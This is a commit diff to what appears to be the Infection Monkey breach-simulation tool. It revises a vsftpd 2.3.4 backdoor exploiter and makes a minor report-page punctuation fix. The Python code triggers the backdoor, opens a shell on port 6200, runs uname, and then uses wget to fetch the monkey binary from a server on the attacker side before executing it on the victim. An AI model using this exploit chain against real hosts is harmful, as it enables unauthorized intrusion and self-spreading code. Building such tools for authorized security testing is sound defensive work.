Updated the exploit.

The `.` was removed from reportpage.js and the exploit was modified.
2019-03-12 19:38:48 +01:00 · 2019-03-12 19:38:48 +01:00 · bb8a1c5c01
parent dade4daad2
commit bb8a1c5c01
2 changed files with 20 additions and 26 deletions
--- a/monkey/infection_monkey/exploit/vsftpd.py
+++ b/monkey/infection_monkey/exploit/vsftpd.py
@ -1,17 +1,15 @@
-import logging
-from logging import getLogger
-
-import paramiko
 import StringIO
-import socket 
+import logging
+import paramiko
+import socket
 import time
-
+from common.utils.exploit_enum import ExploitType
 from infection_monkey.exploit import HostExploiter
+from infection_monkey.exploit.tools import build_monkey_commandline
 from infection_monkey.exploit.tools import get_target_monkey, HTTPTools, get_monkey_depth
 from infection_monkey.model import MONKEY_ARG
 from infection_monkey.network.tools import check_tcp_port
-from infection_monkey.exploit.tools import build_monkey_commandline
-from common.utils.exploit_enum import ExploitType
+from logging import getLogger

 LOG = getLogger(__name__)

@ -23,7 +21,6 @@ USERNAME = b'USER letmein:)\n'
 PASSWORD = b'PASS please\n'


-
 class VSFTPDExploiter(HostExploiter):
    _TARGET_OS_TYPE = ['linux']
    
@ -53,16 +50,7 @@ class VSFTPDExploiter(HostExploiter):
            backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            backdoor_socket.connect((self.host.ip_addr, 6200))
            LOG.info('[+] Connected to backdoor on %s:6200', self.host.ip_addr)
-            command = str.encode("uname -o" + '\n')
-            backdoor_socket.send(command)
-            response = backdoor_socket.recv(1024).decode('utf-8')
-            LOG.info('[+] Response for uname -o: %s', response)
-            if 'linux' in response.lower().strip():
-                #command execution is successful
-                self.host.os['type'] = 'linux'
-            else :
-                LOG.info("Port 6200 opened but failed to execute commands on victim %r ",self.host)
-
+            
            command = str.encode("uname -m" + '\n')
            backdoor_socket.send(command)
            response = backdoor_socket.recv(1024).decode('utf-8')
@ -70,10 +58,13 @@ class VSFTPDExploiter(HostExploiter):
            if '' != response.lower().strip():
                #command execution is successful
                self.host.os['machine'] = response.lower().strip()
+                self.host.os['type'] = 'linux'
+
            else :
                LOG.info("Failed to execute command uname -m on victim %r ",self.host)

            src_path = get_target_monkey(self.host)
+            LOG.info("src for suitable monkey executable for host %r is %s", self.host,src_path)

            if not src_path:
                LOG.info("Can't find suitable monkey executable for host %r", self.host)
@ -83,16 +74,19 @@ class VSFTPDExploiter(HostExploiter):
            LOG.info('[+] Connected to backdoor on %s:6200', self.host.ip_addr)

            #copy the monkey into the machine
-            http_path, http_thread = HTTPTools.create_transfer(self.host, src_path)
+            http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
            dropper_target_path_linux = self._config.dropper_target_path_linux
+            LOG.info("Download link for monkey is %s",http_path)    

            #download the monkey
            download_command = '/usr/bin/wget %s -O %s;' %  (
-                    http_path, dropper_target_path_linux)
+                http_path, dropper_target_path_linux)
            LOG.info("Download_command is %s",download_command)            
            
            command = str.encode(str(download_command) + '\n')
-            backdoor_socket.send(command)
+	    backdoor_socket.send(command)
+	    time.sleep(3) # wait till the file is downloaded	
+	    LOG.info("waiting 3 seconds for download to be completed")       

            #changeit to executable
            
@ -108,13 +102,13 @@ class VSFTPDExploiter(HostExploiter):
            cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
            cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1)
            cmdline += "&"
-            
-	        command = str.encode(str(cmdline) + '\n')
+	    	
+            command = str.encode(str(cmdline) + '\n')
            backdoor_socket.send(command)
+	    
            LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
                     self._config.dropper_target_path_linux, self.host, cmdline)
            
-            backdoor_socket.close()
            self._exploit_info['Vulnerability'] = {"Success":"True"}
                     
        except Exception:
--- a/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js
+++ b/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js
@ -302,7 +302,7 @@ class ReportPageComponent extends AuthComponent {
                className="label label-warning">
                    {this.state.report.overview.issues.filter(function (x) {
                      return x === true;
-                    }).length} threats.</span>:
+                    }).length} threats</span>:
                <ul>
                  {this.state.report.overview.issues[this.Issue.STOLEN_SSH_KEYS] ?
                    <li>Stolen SSH keys are used to exploit other machines.</li> : null }